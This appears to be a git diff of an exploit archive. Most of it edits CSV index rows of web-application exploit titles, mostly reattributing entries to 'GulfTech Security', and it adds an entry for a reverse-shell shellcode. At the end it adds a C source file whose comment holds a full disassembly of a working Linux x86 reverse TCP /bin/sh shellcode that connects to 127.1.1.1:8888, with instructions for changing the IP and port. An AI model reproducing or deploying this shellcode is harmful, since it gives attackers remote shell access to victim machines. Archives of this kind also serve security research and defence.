25898,exploits/php/webapps/25898.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'calendar.php' Multiple SQL Injections",2005-06-24,"James Bercegay",webapps,php,
25899,exploits/php/webapps/25899.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'modifypost.php?Number' SQL Injection",2005-06-24,"James Bercegay",webapps,php,
25900,exploits/php/webapps/25900.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'viewmessage.php?message' SQL Injection",2005-06-24,"James Bercegay",webapps,php,
25901,exploits/php/webapps/25901.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'addfav.php?main' SQL Injection",2005-06-24,"James Bercegay",webapps,php,
25902,exploits/php/webapps/25902.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'notifymod.php?Number' SQL Injection",2005-06-24,"James Bercegay",webapps,php,
25903,exploits/php/webapps/25903.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'grabnext.php?posted' SQL Injection",2005-06-24,"James Bercegay",webapps,php,
25897,exploits/php/webapps/25897.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'download.php?Number' SQL Injection",2005-06-24,"GulfTech Security",webapps,php,
25898,exploits/php/webapps/25898.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'calendar.php' Multiple SQL Injections",2005-06-24,"GulfTech Security",webapps,php,
25899,exploits/php/webapps/25899.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'modifypost.php?Number' SQL Injection",2005-06-24,"GulfTech Security",webapps,php,
25900,exploits/php/webapps/25900.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'viewmessage.php?message' SQL Injection",2005-06-24,"GulfTech Security",webapps,php,
25901,exploits/php/webapps/25901.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'addfav.php?main' SQL Injection",2005-06-24,"GulfTech Security",webapps,php,
25902,exploits/php/webapps/25902.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'notifymod.php?Number' SQL Injection",2005-06-24,"GulfTech Security",webapps,php,
25903,exploits/php/webapps/25903.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'grabnext.php?posted' SQL Injection",2005-06-24,"GulfTech Security",webapps,php,
25904,exploits/php/webapps/25904.c,"K-COLLECT CSV_DB.CGI 1.0/i_DB.CGI 1.0 - Remote Command Execution",2005-06-24,blahplok,webapps,php,
25905,exploits/asp/webapps/25905.txt,"ASPNuke 0.80 - 'forgot_password.asp?email' Cross-Site Scripting",2005-06-27,"Alberto Trivero",webapps,asp,
25906,exploits/asp/webapps/25906.txt,"ASPNuke 0.80 - 'register.asp' Multiple Cross-Site Scripting Vulnerabilities",2005-06-27,"Alberto Trivero",webapps,asp,
@ -28247,14 +28254,14 @@ id,file,description,date,author,type,platform,port
26048,exploits/php/webapps/26048.txt,"Easypx41 - Multiple Variable Injection Vulnerabilities",2005-07-29,FalconDeOro,webapps,php,
26049,exploits/php/webapps/26049.txt,"VBZoom 1.0/1.11 - 'profile.php?Username' Cross-Site Scripting",2005-07-29,almaster,webapps,php,
26050,exploits/php/webapps/26050.txt,"VBZoom 1.0/1.11 - 'login.php?UserID' Cross-Site Scripting",2005-07-29,almaster,webapps,php,
26051,exploits/php/webapps/26051.txt,"Kayako LiveResponse 2.0 - 'index.php?Username' Cross-Site Scripting",2005-07-30,"James Bercegay",webapps,php,
26052,exploits/php/webapps/26052.txt,"Kayako LiveResponse 2.0 - 'index.php' Calendar Feature Multiple SQL Injections",2005-07-30,"James Bercegay",webapps,php,
26051,exploits/php/webapps/26051.txt,"Kayako Live Response 2.0 - 'index.php?Username' Cross-Site Scripting",2005-07-30,"GulfTech Security",webapps,php,
26052,exploits/php/webapps/26052.txt,"Kayako Live Response 2.0 - 'index.php' Calendar Feature Multiple SQL Injections",2005-07-30,"GulfTech Security",webapps,php,
26053,exploits/php/webapps/26053.txt,"PluggedOut CMS 0.4.8 - 'contenttypeid' SQL Injection",2005-09-30,FalconDeOro,webapps,php,
26054,exploits/php/webapps/26054.txt,"PluggedOut CMS 0.4.8 - 'admin.php' Cross-Site Scripting",2005-09-30,FalconDeOro,webapps,php,
26055,exploits/php/webapps/26055.txt,"Ragnarok Online Control Panel 4.3.4 a - Authentication Bypass",2005-07-30,VaLiuS,webapps,php,
26056,exploits/php/webapps/26056.txt,"MySQL AB Eventum 1.x - 'view.php?id' Cross-Site Scripting",2005-08-01,"James Bercegay",webapps,php,
26057,exploits/php/webapps/26057.txt,"MySQL AB Eventum 1.x - 'list.php?release' Cross-Site Scripting",2005-08-01,"James Bercegay",webapps,php,
26058,exploits/php/webapps/26058.txt,"MySQL AB Eventum 1.x - 'get_jsrs_data.php?F' Cross-Site Scripting",2005-08-01,"James Bercegay",webapps,php,
26056,exploits/php/webapps/26056.txt,"MySQL AB Eventum 1.x - 'view.php?id' Cross-Site Scripting",2005-08-01,"GulfTech Security",webapps,php,
26057,exploits/php/webapps/26057.txt,"MySQL AB Eventum 1.x - 'list.php?release' Cross-Site Scripting",2005-08-01,"GulfTech Security",webapps,php,
26058,exploits/php/webapps/26058.txt,"MySQL AB Eventum 1.x - 'get_jsrs_data.php?F' Cross-Site Scripting",2005-08-01,"GulfTech Security",webapps,php,
26059,exploits/php/webapps/26059.txt,"PHPFreeNews 1.x - Multiple Cross-Site Scripting Vulnerabilities",2005-08-01,rgod,webapps,php,
26060,exploits/cfm/webapps/26060.txt,"AderSoftware CFBB 1.1 - 'index.cfm' Cross-Site Scripting",2005-08-01,rUnViRuS,webapps,cfm,
26061,exploits/php/webapps/26061.txt,"PHPFreeNews 1.x - Admin Login SQL Injection",2005-08-01,rgod,webapps,php,
@ -28359,7 +28366,7 @@ id,file,description,date,author,type,platform,port
26182,exploits/php/webapps/26182.txt,"Land Down Under 800 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-20,bl2k,webapps,php,
26183,exploits/php/webapps/26183.txt,"NEPHP 3.0.4 - 'browse.php' Cross-Site Scripting",2005-08-22,bl2k,webapps,php,
26184,exploits/php/webapps/26184.txt,"PHPKit 1.6.1 - 'member.php' SQL Injection",2005-08-22,phuket,webapps,php,
26186,exploits/php/webapps/26186.txt,"RunCMS 1.1/1.2 Module Newbb_plus/Messages - SQL Injection",2005-08-22,"James Bercegay",webapps,php,
26186,exploits/php/webapps/26186.txt,"RunCMS 1.1/1.2 Module Newbb_plus/Messages - SQL Injection",2005-08-22,"GulfTech Security",webapps,php,
26187,exploits/php/webapps/26187.txt,"PostNuke 0.76 RC4b Comments Module - 'moderate' Cross-Site Scripting",2005-08-22,"Maksymilian Arciemowicz",webapps,php,
26188,exploits/php/webapps/26188.txt,"PostNuke 0.76 RC4b - 'user.php?htmltext' Cross-Site Scripting",2005-08-22,"Maksymilian Arciemowicz",webapps,php,
26189,exploits/php/webapps/26189.txt,"PostNuke 0.75/0.76 DL - 'viewdownload.php' SQL Injection",2005-08-22,"Maksymilian Arciemowicz",webapps,php,
@ -29125,12 +29132,12 @@ id,file,description,date,author,type,platform,port
27163,exploits/cgi/webapps/27163.txt,"IBM Tivoli Access Manager Plugin - Directory Traversal",2006-02-04,"Timothy D. Morgan",webapps,cgi,
27164,exploits/php/webapps/27164.txt,"UBBCentral UBB.Threads 6.3 - 'showflat.php' SQL Injection",2006-01-29,k-otik,webapps,php,
27165,exploits/php/webapps/27165.txt,"Beehive Forum 0.6.2 - 'index.php' SQL Injection",2005-12-22,trueend5,webapps,php,
27166,exploits/php/webapps/27166.txt,"EyeOS 0.8.x - Session Remote Command Execution",2006-02-07,"James Bercegay",webapps,php,
27166,exploits/php/webapps/27166.txt,"eyeOS 0.8.x - Session Remote Command Execution",2006-02-07,"GulfTech Security",webapps,php,
27167,exploits/php/webapps/27167.txt,"MyBB 1.0.3 - 'moderation.php' SQL Injection",2006-02-07,imei,webapps,php,
27169,exploits/asp/webapps/27169.txt,"Webeveyn Whomp! Real Estate Manager 2005 - Login SQL Injection",2006-02-08,night_warrior771,webapps,asp,
27170,exploits/php/webapps/27170.txt,"vwdev - 'index.php' SQL Injection",2006-02-08,"Omid Aghababaei",webapps,php,
27172,exploits/php/webapps/27172.txt,"SPIP 1.8.2 - 'Spip_RSS.php' Remote Command Execution",2006-02-08,rgod,webapps,php,
27173,exploits/php/webapps/27173.txt,"CPAINT 1.3/2.0 - 'TYPE.php' Cross-Site Scripting",2006-02-08,"James Bercegay",webapps,php,
27173,exploits/php/webapps/27173.txt,"CPAINT 1.3/2.0.2 - 'TYPE.php' Cross-Site Scripting",2006-02-08,"GulfTech Security",webapps,php,
27174,exploits/asp/webapps/27174.txt,"GA's Forum Light - 'Archive.asp' SQL Injection",2006-02-07,Dj_Eyes,webapps,asp,
27175,exploits/php/webapps/27175.php,"PwsPHP 1.2.3 - SQL Injection",2006-02-09,papipsycho,webapps,php,
27176,exploits/php/webapps/27176.txt,"Papoo 2.1.x - Multiple Cross-Site Scripting Vulnerabilities",2006-02-09,"Dj Eyes",webapps,php,
@ -29156,7 +29163,7 @@ id,file,description,date,author,type,platform,port
27202,exploits/php/webapps/27202.txt,"Lawrence Osiris DB_eSession 1.0.2 - Class SQL Injection",2006-02-13,"GulfTech Security",webapps,php,
27204,exploits/php/webapps/27204.html,"Virtual Hosting Control System 2.2/2.4 - 'change_password.php' Current Password",2006-02-13,"Roman Medina-Heigl Hernandez",webapps,php,
27205,exploits/php/webapps/27205.html,"Virtual Hosting Control System 2.2/2.4 - 'login.php?check_login()' Authentication Bypass",2006-02-13,"Roman Medina-Heigl Hernandez",webapps,php,
27206,exploits/php/webapps/27206.txt,"XMB Forum 1.8/1.9 - 'u2u.php?Username' Cross-Site Scripting",2006-02-13,"James Bercegay",webapps,php,
27206,exploits/php/webapps/27206.txt,"XMB Forum 1.8/1.9 - 'u2u.php?Username' Cross-Site Scripting",2006-02-13,"GulfTech Security",webapps,php,
27207,exploits/php/webapps/27207.txt,"Clever Copy 2.0/3.0 - Multiple HTML Injection Vulnerabilities",2006-02-13,"Aliaksandr Hartsuyeu",webapps,php,
27208,exploits/php/webapps/27208.txt,"PHP-Nuke 6.x/7.x - 'header.php?Pagetitle' Cross-Site Scripting",2006-02-13,"Janek Vind",webapps,php,
27209,exploits/php/webapps/27209.txt,"Gastebuch 1.3.2 - Cross-Site Scripting",2006-02-13,"Micha Borrmann",webapps,php,
@ -29975,7 +29982,7 @@ id,file,description,date,author,type,platform,port
28385,exploits/asp/webapps/28385.txt,"BlaBla 4U - Multiple Cross-Site Scripting Vulnerabilities",2006-08-14,Vampire,webapps,asp,
28388,exploits/php/webapps/28388.txt,"PHP-Nuke 2.0 AutoHTML Module - Local File Inclusion",2006-08-15,MosT3mR,webapps,php,
28390,exploits/php/webapps/28390.txt,"Lizge 20 - 'index.php' Multiple Remote File Inclusions",2006-08-15,Crackers_Child,webapps,php,
28392,exploits/php/webapps/28392.txt,"Zen Cart Web Shopping Cart 1.x - 'autoload_func.php?autoLoadConfig[999][0][loadFile]' Remote File Inclusion",2006-08-15,"James Bercegay",webapps,php,
28392,exploits/php/webapps/28392.txt,"Zen Cart Web Shopping Cart 1.3.0.2 - 'autoload_func.php?autoLoadConfig[999][0][loadFile]' Remote File Inclusion",2006-08-15,"GulfTech Security",webapps,php,
28393,exploits/asp/webapps/28393.txt,"AspxCommerce 2.0 - Arbitrary File Upload",2013-09-19,SANTHO,webapps,asp,
28396,exploits/php/webapps/28396.txt,"Mambo Component Reporter 1.0 - 'Reporter.sql.php' Remote File Inclusion",2006-08-16,Crackers_Child,webapps,php,
28399,exploits/php/webapps/28399.txt,"CubeCart 3.0.x - Multiple Input Validation Vulnerabilities",2006-08-17,rgod,webapps,php,
@ -30015,7 +30022,7 @@ id,file,description,date,author,type,platform,port
28443,exploits/asp/webapps/28443.html,"Digiappz Freekot 1.01 - ASP SQL Injection",2006-08-30,FarhadKey,webapps,asp,
28444,exploits/php/webapps/28444.txt,"Alstrasoft Template Seller - 'Config[Template_Path]' Multiple Remote File Inclusions",2006-08-30,night_warrior771,webapps,php,
28446,exploits/php/webapps/28446.txt,"HLstats 1.34 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-08-30,MC.Iglo,webapps,php,
28447,exploits/php/webapps/28447.php,"osCommerce 2.1/2.2 - 'product_info.php' SQL Injection",2006-08-30,"James Bercegay",webapps,php,
28447,exploits/php/webapps/28447.php,"osCommerce 2.1/2.2 - 'product_info.php' SQL Injection",2006-08-30,"GulfTech Security",webapps,php,
28749,exploits/php/webapps/28749.txt,"osCommerce 2.2 - '/admin/newsletters.php?page' Cross-Site Scripting",2006-10-04,Lostmon,webapps,php,
28750,exploits/php/webapps/28750.txt,"osCommerce 2.2 - '/admin/orders_status.php?page' Cross-Site Scripting",2006-10-04,Lostmon,webapps,php,
28751,exploits/php/webapps/28751.txt,"osCommerce 2.2 - '/admin/products_attributes.php?page' Cross-Site Scripting",2006-10-04,Lostmon,webapps,php,
@ -30176,7 +30183,7 @@ id,file,description,date,author,type,platform,port
28637,exploits/php/webapps/28637.txt,"BandSite CMS 1.1 - 'signgbook_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",webapps,php,
28638,exploits/php/webapps/28638.txt,"BandSite CMS 1.1 - 'footer.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",webapps,php,
28644,exploits/php/webapps/28644.txt,"Google Mini Search Appliance 4.4.102.M.36 - Information Disclosure",2006-09-22,"Patrick Webster",webapps,php,
28645,exploits/php/webapps/28645.txt,"CakePHP 1.1.7.3363 - 'Vendors.php' Directory Traversal",2006-09-22,"James Bercegay",webapps,php,
28645,exploits/php/webapps/28645.txt,"CakePHP 1.1.7.3363 - 'Vendors.php' Directory Traversal",2006-09-22,"GulfTech Security",webapps,php,
28646,exploits/php/webapps/28646.txt,"mysource 2.14.8/2.16 - Multiple Vulnerabilities",2006-09-22,"Patrick Webster",webapps,php,
28647,exploits/php/webapps/28647.txt,"PLESK 7.5/7.6 - 'FileManager.php' Directory Traversal",2006-09-22,GuanYu,webapps,php,
28649,exploits/hardware/webapps/28649.txt,"Tenda W309R Router 5.07.46 - Configuration Disclosure",2013-09-30,SANTHO,webapps,hardware,
@ -30245,7 +30252,7 @@ id,file,description,date,author,type,platform,port
28736,exploits/php/webapps/28736.txt,"DeluxeBB 1.09 - 'Sig.php' Remote File Inclusion",2006-10-02,r0ut3r,webapps,php,
28737,exploits/php/webapps/28737.txt,"PHP Web Scripts Easy Banner - 'functions.php' Remote File Inclusion",2006-10-02,"abu ahmed",webapps,php,
28738,exploits/php/webapps/28738.txt,"Digishop 4.0 - 'cart.php' Cross-Site Scripting",2006-10-02,meto5757,webapps,php,
28740,exploits/php/webapps/28740.txt,"HAMweather 3.9.8 - 'template.php' Script Code Injection",2006-10-03,"James Bercegay",webapps,php,
28740,exploits/php/webapps/28740.txt,"HAMweather 3.9.8 - 'template.php' Script Code Injection",2006-10-03,"GulfTech Security",webapps,php,
28741,exploits/php/webapps/28741.txt,"Yener Haber Script 1.0/2.0 - SQL Injection",2006-10-04,Dj_ReMix,webapps,php,
28742,exploits/asp/webapps/28742.txt,"ASPPlayGround.NET Forum 2.4.5 - 'Calendar.asp' Cross-Site Scripting",2006-10-27,MizoZ,webapps,asp,
28743,exploits/php/webapps/28743.txt,"osCommerce 2.2 - '/admin/banner_manager.php?page' Cross-Site Scripting",2006-10-04,Lostmon,webapps,php,
@ -31646,7 +31653,7 @@ id,file,description,date,author,type,platform,port
30848,exploits/php/webapps/30848.txt,"Joomla! Component Content 1.5 RC3 - 'view' SQL Injection",2007-12-05,beenudel1986,webapps,php,
30849,exploits/php/webapps/30849.txt,"Joomla! Component com_search 1.5 RC3 - 'index.php' Multiple SQL Injections",2007-12-05,beenudel1986,webapps,php,
30851,exploits/php/webapps/30851.txt,"VisualShapers EZContents 1.4.5 - File Disclosure",2007-12-05,p4imi0,webapps,php,
30852,exploits/php/webapps/30852.txt,"Kayako SupportSuite 3.0.32 - PHP_SELF Trigger_Error Function Cross-Site Scripting",2007-12-06,imei,webapps,php,
30852,exploits/php/webapps/30852.txt,"Kayako SupportSuite 3.0.32 - 'PHP_SELF Trigger_Error' Function Cross-Site Scripting",2007-12-06,imei,webapps,php,
30853,exploits/php/webapps/30853.txt,"OpenNewsletter 2.5 - 'Compose.php' Cross-Site Scripting",2007-12-06,Manu,webapps,php,
30854,exploits/php/webapps/30854.sh,"wwwstats 3.21 - 'Clickstats.php' Multiple HTML Injection Vulnerabilities",2007-12-15,"Jesus Olmos Gonzalez",webapps,php,
30855,exploits/asp/webapps/30855.txt,"WebDoc 3.0 - Multiple SQL Injections",2007-12-07,Chrysalid,webapps,asp,
@ -32475,7 +32482,7 @@ id,file,description,date,author,type,platform,port
32118,exploits/php/webapps/32118.txt,"Greatclone GC Auction Platinum - 'category.php' SQL Injection",2008-07-27,"Hussin X",webapps,php,
32119,exploits/asp/webapps/32119.txt,"Web Wiz Forum 9.5 - 'admin_group_details.asp?mode' Cross-Site Scripting",2008-07-28,CSDT,webapps,asp,
32120,exploits/asp/webapps/32120.txt,"Web Wiz Forum 9.5 - 'admin_category_details.asp?mode' Cross-Site Scripting",2008-07-28,CSDT,webapps,asp,
32121,exploits/php/webapps/32121.php,"Jamroom 3.3.8 - Cookie Authentication Bypass",2008-07-28,"James Bercegay",webapps,php,
32121,exploits/php/webapps/32121.php,"Jamroom 3.3.8 - Cookie Authentication Bypass",2008-07-28,"GulfTech Security",webapps,php,
32122,exploits/php/webapps/32122.txt,"Owl Intranet Engine 0.95 - 'register.php' Cross-Site Scripting",2008-07-28,"Fabian Fingerle",webapps,php,
32123,exploits/php/webapps/32123.txt,"MiniBB RSS 2.0 Plugin - Multiple Remote File Inclusions",2008-07-29,"Ghost Hacker",webapps,php,
32126,exploits/php/webapps/32126.txt,"ScrewTurn Software ScrewTurn Wiki 2.0.x - 'System Log' Page HTML Injection",2008-05-11,Portcullis,webapps,php,
@ -32535,9 +32542,9 @@ id,file,description,date,author,type,platform,port
32213,exploits/php/webapps/32213.txt,"vTiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion",2014-03-12,Portcullis,webapps,php,80
32217,exploits/php/webapps/32217.txt,"Linkspider 1.08 - Multiple Remote File Inclusions",2008-08-08,"Rohit Bansal",webapps,php,
32218,exploits/php/webapps/32218.txt,"Domain Group Network GooCMS 1.02 - 'index.php' Cross-Site Scripting",2008-08-11,ahmadbaby,webapps,php,
32219,exploits/php/webapps/32219.txt,"Kayako SupportSuite 3.x - '/visitor/index.php?sessionid' Cross-Site Scripting",2008-08-11,"James Bercegay",webapps,php,
32220,exploits/php/webapps/32220.txt,"Kayako SupportSuite 3.x - 'index.php?filter' Cross-Site Scripting",2008-08-11,"James Bercegay",webapps,php,
32221,exploits/php/webapps/32221.txt,"Kayako SupportSuite 3.x - '/staff/index.php?customfieldlinkid' SQL Injection",2008-08-11,"James Bercegay",webapps,php,
32219,exploits/php/webapps/32219.txt,"Kayako SupportSuite 3.x - '/visitor/index.php?sessionid' Cross-Site Scripting",2008-08-11,"GulfTech Security",webapps,php,
32220,exploits/php/webapps/32220.txt,"Kayako SupportSuite 3.x - 'index.php?filter' Cross-Site Scripting",2008-08-11,"GulfTech Security",webapps,php,
32221,exploits/php/webapps/32221.txt,"Kayako SupportSuite 3.x - '/staff/index.php?customfieldlinkid' SQL Injection",2008-08-11,"GulfTech Security",webapps,php,
32226,exploits/php/webapps/32226.txt,"Datafeed Studio - 'patch.php' Remote File Inclusion",2008-08-12,"Bug Researchers Group",webapps,php,
32227,exploits/php/webapps/32227.txt,"Datafeed Studio 1.6.2 - 'search.php' Cross-Site Scripting",2008-08-12,"Bug Researchers Group",webapps,php,
32230,exploits/php/webapps/32230.txt,"IDevSpot PHPLinkExchange 1.01/1.02 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-12,sl4xUz,webapps,php,
@ -32576,7 +32583,7 @@ id,file,description,date,author,type,platform,port
32274,exploits/php/webapps/32274.txt,"Synology DSM 4.3-3827 - 'article.php' Blind SQL Injection",2014-03-14,"Michael Wisniewski",webapps,php,80
32275,exploits/php/webapps/32275.txt,"itMedia - Multiple SQL Injections",2008-08-18,baltazar,webapps,php,
32278,exploits/asp/webapps/32278.txt,"K Web CMS - 'sayfala.asp' SQL Injection",2008-08-18,baltazar,webapps,asp,
32279,exploits/php/webapps/32279.txt,"Vanilla 1.1.4 - HTML Injection / Cross-Site Scripting",2008-08-19,"James Bercegay",webapps,php,
32279,exploits/php/webapps/32279.txt,"Vanilla 1.1.4 - HTML Injection / Cross-Site Scripting",2008-08-19,"GulfTech Security",webapps,php,
32280,exploits/php/webapps/32280.txt,"YourFreeWorld Ad-Exchange Script - 'id' SQL Injection",2008-08-20,"Hussin X",webapps,php,
32281,exploits/php/webapps/32281.cs,"Folder Lock 5.9.5 - Weak Password Encryption Local Information Disclosure",2008-06-19,"Charalambous Glafkos",webapps,php,
32287,exploits/php/webapps/32287.txt,"FAR-PHP 1.0 - 'index.php' Local File Inclusion",2008-08-21,"Beenu Arora",webapps,php,
@ -32619,7 +32626,7 @@ id,file,description,date,author,type,platform,port
32340,exploits/php/webapps/32340.txt,"Gallery 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-08,sl4xUz,webapps,php,
32342,exploits/php/webapps/32342.txt,"eXtrovert software Thyme 1.3 - 'pick_users.php' SQL Injection",2008-09-08,"Omer Singer",webapps,php,
32346,exploits/php/webapps/32346.txt,"E-PHP B2B Trading Marketplace Script - 'listings.php' SQL Injection",2008-09-07,r45c4l,webapps,php,
32347,exploits/php/webapps/32347.txt,"UBBCentral UBB.Threads 7.3.1 - 'Forum[]' Array SQL Injection",2008-09-02,"James Bercegay",webapps,php,
32347,exploits/php/webapps/32347.txt,"UBBCentral UBB.Threads 7.3.1 - 'Forum[]' Array SQL Injection",2008-09-02,"GulfTech Security",webapps,php,
32351,exploits/php/webapps/32351.txt,"Jaw Portal 1.2 - 'index.php' Multiple Local File Inclusions",2008-09-10,SirGod,webapps,php,
32352,exploits/php/webapps/32352.txt,"AvailScript Job Portal Script - 'applynow.php' SQL Injection",2008-09-10,InjEctOr5,webapps,php,
32353,exploits/php/webapps/32353.txt,"Horde Application Framework 3.2.1 - Forward Slash Insufficient Filtering Cross-Site Scripting",2008-09-10,"Alexios Fakos",webapps,php,
@ -37694,6 +37701,17 @@ id,file,description,date,author,type,platform,port
43414,exploits/hardware/webapps/43414.py,"Huawei Router HG532 - Arbitrary Command Execution",2017-12-25,anonymous,webapps,hardware,37215
43420,exploits/php/webapps/43420.txt,"WordPress Plugin Smart Google Code Inserter < 3.5 - Authentication Bypass / SQL Injection",2018-01-03,"Benjamin Lim",webapps,php,
43422,exploits/multiple/webapps/43422.txt,"EMC xPression 4.5SP1 Patch 13 - 'model.jobHistoryId' SQL Injection",2018-01-03,"Pawel Gocyla",webapps,multiple,
43431,exploits/php/webapps/43431.txt,"gps-server.net GPS Tracking Software < 3.1 - Multiple Vulnerabilities",2018-01-05,"Noman Riffat",webapps,php,
43436,exploits/linux/webapps/43436.txt,"Zen Cart < 1.3.8a - SQL Injection",2008-09-04,"GulfTech Security",webapps,linux,
43437,exploits/multiple/webapps/43437.txt,"PHP Topsites < 2.2 - Multiple Vulnerabilities",2003-01-13,"GulfTech Security",webapps,multiple,
43438,exploits/multiple/webapps/43438.txt,"phpLinks < 2.1.2 - Multiple Vulnerabilities",2003-01-17,"GulfTech Security",webapps,multiple,
43440,exploits/multiple/webapps/43440.txt,"P-Synch < 6.2.5 - Multiple Vulnerabilities",2003-05-30,"GulfTech Security",webapps,multiple,
43441,exploits/multiple/webapps/43441.txt,"WinMX < 2.6 - Design Error",2003-06-02,"GulfTech Security",webapps,multiple,
43442,exploits/multiple/webapps/43442.txt,"FTP Service < 1.2 - Multiple Vulnerabilities",2003-06-03,"GulfTech Security",webapps,multiple,
43443,exploits/multiple/webapps/43443.txt,"MegaBrowser < 0.71b - Multiple Vulnerabilities",2003-06-04,"GulfTech Security",webapps,multiple,
43444,exploits/multiple/webapps/43444.txt,"Max Web Portal < 1.30 - Multiple Vulnerabilities",2003-06-06,"GulfTech Security",webapps,multiple,
43445,exploits/multiple/webapps/43445.txt,"Snitz Forums 2000 < 3.4.0.3 - Multiple Vulnerabilities",2003-06-16,"GulfTech Security",webapps,multiple,
43447,exploits/jsp/webapps/43447.txt,"Gespage 7.4.8 - SQL Injection",2018-01-05,Sysdream,webapps,jsp,
41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",webapps,php,
41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware,
41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware,

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -621,6 +621,7 @@ id,file,description,date,author,type,platform
41509,shellcodes/lin_x86-64/41509.nasm,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",shellcode,lin_x86-64
41510,shellcodes/lin_x86-64/41510.nsam,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",shellcode,lin_x86-64
41581,shellcodes/win_x86/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",shellcode,win_x86
43433,shellcodes/lin_x86/43433.c,"Linux/x86 - Reverse TCP /bin/sh Shell (127.1.1.1:8888/TCP) Null-Free Shellcode (67/69 bytes)",2018-01-05,"Nipun Jaswal",shellcode,lin_x86
41630,shellcodes/lin_x86/41630.asm,"Linux/x86 - exceve /bin/sh Encoded Shellcode (44 Bytes)",2017-03-17,WangYihang,shellcode,lin_x86
41631,shellcodes/lin_x86/41631.c,"Linux/x86 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",shellcode,lin_x86
41635,shellcodes/lin_x86/41635.txt,"Linux/x86 - Read /etc/passwd Shellcode (54 Bytes)",2017-03-19,WangYihang,shellcode,lin_x86

1 id file description date author type platform
621 41509 shellcodes/lin_x86-64/41509.nasm Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes) 2017-03-04 Robert L. Taylor shellcode lin_x86-64
622 41510 shellcodes/lin_x86-64/41510.nsam Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes) 2017-03-04 Robert L. Taylor shellcode lin_x86-64
623 41581 shellcodes/win_x86/41581.c Windows x86 - Hide Console Window Shellcode (182 bytes) 2017-03-11 Ege Balci shellcode win_x86
624 43433 shellcodes/lin_x86/43433.c Linux/x86 - Reverse TCP /bin/sh Shell (127.1.1.1:8888/TCP) Null-Free Shellcode (67/69 bytes) 2018-01-05 Nipun Jaswal shellcode lin_x86
625 41630 shellcodes/lin_x86/41630.asm Linux/x86 - exceve /bin/sh Encoded Shellcode (44 Bytes) 2017-03-17 WangYihang shellcode lin_x86
626 41631 shellcodes/lin_x86/41631.c Linux/x86 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (44 bytes) 2017-03-17 Oleg Boytsev shellcode lin_x86
627 41635 shellcodes/lin_x86/41635.txt Linux/x86 - Read /etc/passwd Shellcode (54 Bytes) 2017-03-19 WangYihang shellcode lin_x86

85
shellcodes/lin_x86/43433.c Normal file
View file

@ -0,0 +1,85 @@
/*
Title: Linux/x86 - Reverse TCP Shell (/bin/sh) (127.1.1.1:8888/TCP) Null-Free Shellcode (69 bytes)
Description: Smallest /bin/sh Reverse TCP Shellcode(Null Free, No Register Pollution Required)
Date : 4/Jan/2018
Author: Nipun Jaswal (@nipunjaswal) ; SLAE-1080
Details:
Smallest /bin/sh based Null & Register Pollution Free x86/linux Reverse Shell TCP (127.1.1.1:8888)( 69 Bytes )
You can modify the port and IP by changing the values for IP and PORT
Note:
If You are compiling the C file itself and dont care about Bad Chars, You can reduce 2 more bytes:
Change the following lines of code:
push word 0xb822
push word 2
To:
push 0xb8220002 ---> This will make the length of the Shellcode to 67 Bytes
*/
/*Disassembly of section .text:
08048060 <_start>:
8048060: 31 db xor ebx,ebx
8048062: 53 push ebx
8048063: 43 inc ebx
8048064: 53 push ebx
8048065: 6a 02 push 0x2
8048067: 89 e1 mov ecx,esp
8048069: 6a 66 push 0x66
804806b: 58 pop eax
804806c: cd 80 int 0x80
804806e: 93 xchg ebx,eax
804806f: 59 pop ecx
08048070 <loop>:
8048070: b0 3f mov al,0x3f
8048072: cd 80 int 0x80
8048074: 49 dec ecx
8048075: 79 f9 jns 8048070 <loop>
8048077: 68 7f 01 01 01 push 0x101017f
804807c: 66 68 22 b8 pushw 0xb822
8048080: 66 6a 02 pushw 0x2
8048083: 89 e1 mov ecx,esp
8048085: b0 66 mov al,0x66
8048087: 50 push eax
8048088: 51 push ecx
8048089: 53 push ebx
804808a: b3 03 mov bl,0x3
804808c: 89 e1 mov ecx,esp
804808e: cd 80 int 0x80
8048090: 52 push edx
8048091: 68 2f 2f 73 68 push 0x68732f2f
8048096: 68 2f 62 69 6e push 0x6e69622f
804809b: 89 e3 mov ebx,esp
804809d: 52 push edx
804809e: 53 push ebx
804809f: 89 e1 mov ecx,esp
80480a1: b0 0b mov al,0xb
80480a3: cd 80 int 0x80
EDB Note: Source ~ http://www.nipunjaswal.com/2018/01/tale-of-the-smallest-shellcode.html
*/
#include<stdio.h>
#include<string.h>
#define IP "\x7f\x01\x01\x01"
#define PORT "\x22\xb8"
